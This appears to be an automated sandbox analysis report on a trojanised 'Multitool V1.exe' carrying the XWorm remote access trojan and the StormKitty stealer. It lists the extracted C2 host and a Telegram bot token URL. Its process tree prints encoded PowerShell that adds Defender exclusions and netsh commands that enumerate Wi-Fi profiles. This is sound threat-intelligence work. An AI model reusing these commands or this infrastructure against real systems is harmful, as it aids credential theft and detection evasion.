Overview

overview

10

Static

static

3

Multitool V1.exe

windows7-x64

10

Multitool V1.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    21s
  • max time network
    20s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/03/2025, 23:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Multitool V1.exe

  • Size

    307KB

  • MD5

    520f8ed0d73dbc6540fc80ac0c3847e1

  • SHA1

    81476c36b9ea1b6d18864b90310eb95ec20e5475

  • SHA256

    b148b01f921c8ee6aab7c5cb0b27b494f7ff5632f5a7dd2cbd1ccf206a5eb1ba

  • SHA512

    0981f5323101a214f1ee6e57f5d10b2136213ef88b4b44e1bd769114734679c2439f6338df585712137ef01684cc7b2658a3820f79da0b196c2e7a11bb06b2e4

  • SSDEEP

    6144:aMCOuWBJL5pt0UA8yTHsRRs6kkU7ezfQE62e3goypHp/3EvCcp3yVaG:aMCOucJL5pEDkU7Me3gpQTyVaG

Score
10/10
stormkittyxwormcollectiondefense_evasiondiscoverypersistenceprivilege_escalationratspywarestealertrojan

Malware Config

Extracted

Family

xworm

C2

127.0.0.1:38960

metherium-38960.portmap.host:38960
Attributes
  • Install_directory

    %AppData%

  • install_file

    host.exe

  • telegram

    https://api.telegram.org/bot7283946415:AAGGT2xYjdDOFdezS7k5STvPS9SoyGQdKEg

Signatures

  • Detect Xworm Payload 2 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

    stealerstormkitty
  • StormKitty payload 2 IoCs
  • Stormkitty family
    stormkitty
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of FindShellTrayWindow 28 IoCs
  • Suspicious use of SendNotifyMessage 27 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Multitool V1.exe
    "C:\Users\Admin\AppData\Local\Temp\Multitool V1.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:348
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAcQB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AbABlACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUAB5AHQAaABvAG4AIABJAG4AcwB0AGEAbABsAGEAdABpAG8AbgAgAE4AZQBlAGQAZQBlAGQAJwAsACcAJwAsACcATwBLACcALAAnAFcAYQByAG4AaQBuAGcAJwApADwAIwBwAGEAYwAjAD4A"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5044
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAbgB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAcwBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAcAB6ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAbgB5ACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3516
    • C:\Users\Admin\AppData\Roaming\client.exe
      "C:\Users\Admin\AppData\Roaming\client.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3664
    • C:\Users\Admin\AppData\Local\svchost.exe
      "C:\Users\Admin\AppData\Local\svchost.exe"
      2⤵
      • Executes dropped EXE
      • Accesses Microsoft Outlook profiles
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      • outlook_office_path
      • outlook_win_path
      PID:3300
      • C:\Windows\SysWOW64\cmd.exe
        "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
        3⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Wi-Fi Discovery
        • Suspicious use of WriteProcessMemory
        PID:2480
        • C:\Windows\SysWOW64\chcp.com
          chcp 65001
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4168
        • C:\Windows\SysWOW64\netsh.exe
          netsh wlan show profile
          4⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Wi-Fi Discovery
          PID:4936
        • C:\Windows\SysWOW64\findstr.exe
          findstr All
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3804
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3300 -s 2464
        3⤵
        • Program crash
        PID:3888
      • C:\Windows\SysWOW64\cmd.exe
        "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4388
        • C:\Windows\SysWOW64\chcp.com
          chcp 65001
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1092
        • C:\Windows\SysWOW64\netsh.exe
          netsh wlan show networks mode=bssid
          4⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:2192
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3300 -ip 3300
    1⤵
      PID:4248
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /4
      1⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:2472

    Network

    MITRE ATT&CK Enterprise v15

    Reconnaissance

    Resource Development

    Initial Access

    Execution

    Persistence

    Event Triggered Execution

    1
    T1546

    Netsh Helper DLL

    1
    T1546.007

    Privilege Escalation

    Event Triggered Execution

    1
    T1546

    Netsh Helper DLL

    1
    T1546.007

    Defense Evasion

    Obfuscated Files or Information

    1
    T1027

    Command Obfuscation

    1
    T1027.010

    Credential Access

    Credentials from Password Stores

    1
    T1555

    Credentials from Web Browsers

    1
    T1555.003

    Unsecured Credentials

    1
    T1552

    Credentials In Files

    1
    T1552.001

    Discovery

    Browser Information Discovery

    1
    T1217

    Peripheral Device Discovery

    1
    T1120

    Query Registry

    3
    T1012

    System Information Discovery

    4
    T1082

    System Location Discovery

    1
    T1614

    System Language Discovery

    1
    T1614.001

    System Network Configuration Discovery

    1
    T1016

    Wi-Fi Discovery

    1
    T1016.002

    Lateral Movement

    Collection

    Data from Local System

    1
    T1005

    Email Collection

    1
    T1114

    Command and Control

    Exfiltration

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      968cb9309758126772781b83adb8a28f

      SHA1

      8da30e71accf186b2ba11da1797cf67f8f78b47c

      SHA256

      92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

      SHA512

      4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      17KB

      MD5

      90258fe103e4449f3e202dee517114b7

      SHA1

      3a8dc3d397696ff139bdf9b648e473650a2acea3

      SHA256

      096c4157f740da1f635a228ea9e37238b055230bc3d28091fe08617fbae30d22

      SHA512

      94163225a0b3459a426af47a59f2e940639520ac0097d5bee57ef490216c20aa678cc813d9a840ea0e2a76cae8e413eec62dccd7feb89cc7a391b4d0ba26b494

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_44hgtihy.j13.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\svchost.exe
      Filesize

      213KB

      MD5

      23b83fe86a71cfba0d920fc658b3e010

      SHA1

      c9fd9d1dc68bcef1bfb2845d4cc35ea2a5b9d6dc

      SHA256

      6259f4d3310169e2b795e26a95ae21c7781abcb726322bc2eae0102546c816cf

      SHA512

      22a49771a71a7b4504635692d0d671223cfb4a5d5f8d892918291f1b733336b935926b67ae032f4797e3067f1d4f4aee4bf2ff2b0f2f607ea465ea6e87365ea3

      Download Submit

    • C:\Users\Admin\AppData\Roaming\client.exe
      Filesize

      79KB

      MD5

      10db01a500572f3468f4302068d6db1e

      SHA1

      90589a587d2ea36451a11e650a7b0041807b3be8

      SHA256

      cae10e709d8f1dcf7deee20ddc601be133961ed8542f8505d3a016bbedfc9e84

      SHA512

      c8cdd0eae61bc94f5978673e2bbda0b7916a87b7ab582036c3b95978b404f78202f3e8f31b32e050fd7298a682382b61db8c9b13828d97786ed052720fd3b8f9

      Download Submit

    • memory/2472-135-0x000001A3160A0000-0x000001A3160A1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2472-125-0x000001A3160A0000-0x000001A3160A1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2472-130-0x000001A3160A0000-0x000001A3160A1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2472-124-0x000001A3160A0000-0x000001A3160A1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2472-129-0x000001A3160A0000-0x000001A3160A1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2472-131-0x000001A3160A0000-0x000001A3160A1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2472-132-0x000001A3160A0000-0x000001A3160A1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2472-133-0x000001A3160A0000-0x000001A3160A1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2472-123-0x000001A3160A0000-0x000001A3160A1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2472-134-0x000001A3160A0000-0x000001A3160A1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/3300-29-0x0000000005140000-0x0000000005302000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/3300-24-0x0000000073F2E000-0x0000000073F2F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/3300-54-0x00000000062F0000-0x000000000681C000-memory.dmp

      Filesize

      5.2MB

      Download

    • memory/3300-63-0x0000000006DC0000-0x0000000006E52000-memory.dmp

      Filesize

      584KB

      Download

    • memory/3300-25-0x00000000000F0000-0x000000000012C000-memory.dmp

      Filesize

      240KB

      Download

    • memory/3300-28-0x0000000004F50000-0x0000000004F62000-memory.dmp

      Filesize

      72KB

      Download

    • memory/3516-120-0x0000000007190000-0x0000000007198000-memory.dmp

      Filesize

      32KB

      Download

    • memory/3516-98-0x0000000006120000-0x0000000006152000-memory.dmp

      Filesize

      200KB

      Download

    • memory/3516-109-0x0000000006100000-0x000000000611E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/3516-110-0x0000000006D20000-0x0000000006DC3000-memory.dmp

      Filesize

      652KB

      Download

    • memory/3516-38-0x0000000005580000-0x00000000058D4000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/3516-52-0x0000000005B50000-0x0000000005B6E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/3516-113-0x0000000006EF0000-0x0000000006EFA000-memory.dmp

      Filesize

      40KB

      Download

    • memory/3516-114-0x00000000070F0000-0x0000000007186000-memory.dmp

      Filesize

      600KB

      Download

    • memory/3516-115-0x0000000007070000-0x0000000007081000-memory.dmp

      Filesize

      68KB

      Download

    • memory/3516-117-0x00000000070B0000-0x00000000070BE000-memory.dmp

      Filesize

      56KB

      Download

    • memory/3516-118-0x00000000070C0000-0x00000000070D4000-memory.dmp

      Filesize

      80KB

      Download

    • memory/3516-119-0x00000000071B0000-0x00000000071CA000-memory.dmp

      Filesize

      104KB

      Download

    • memory/3516-99-0x0000000070A70000-0x0000000070ABC000-memory.dmp

      Filesize

      304KB

      Download

    • memory/3516-26-0x0000000000DE0000-0x0000000000E16000-memory.dmp

      Filesize

      216KB

      Download

    • memory/3516-53-0x0000000005B80000-0x0000000005BCC000-memory.dmp

      Filesize

      304KB

      Download

    • memory/3664-95-0x000000001BB20000-0x000000001BB30000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3664-23-0x0000000000F30000-0x0000000000F4A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/3664-20-0x00007FFAD0DA3000-0x00007FFAD0DA5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/5044-97-0x0000000006980000-0x000000000699A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/5044-31-0x00000000055B0000-0x0000000005616000-memory.dmp

      Filesize

      408KB

      Download

    • memory/5044-32-0x0000000005E00000-0x0000000005E66000-memory.dmp

      Filesize

      408KB

      Download

    • memory/5044-27-0x00000000057D0000-0x0000000005DF8000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/5044-30-0x0000000005510000-0x0000000005532000-memory.dmp

      Filesize

      136KB

      Download

    • memory/5044-111-0x0000000008780000-0x0000000008D24000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/5044-96-0x0000000007B50000-0x00000000081CA000-memory.dmp

      Filesize

      6.5MB

      Download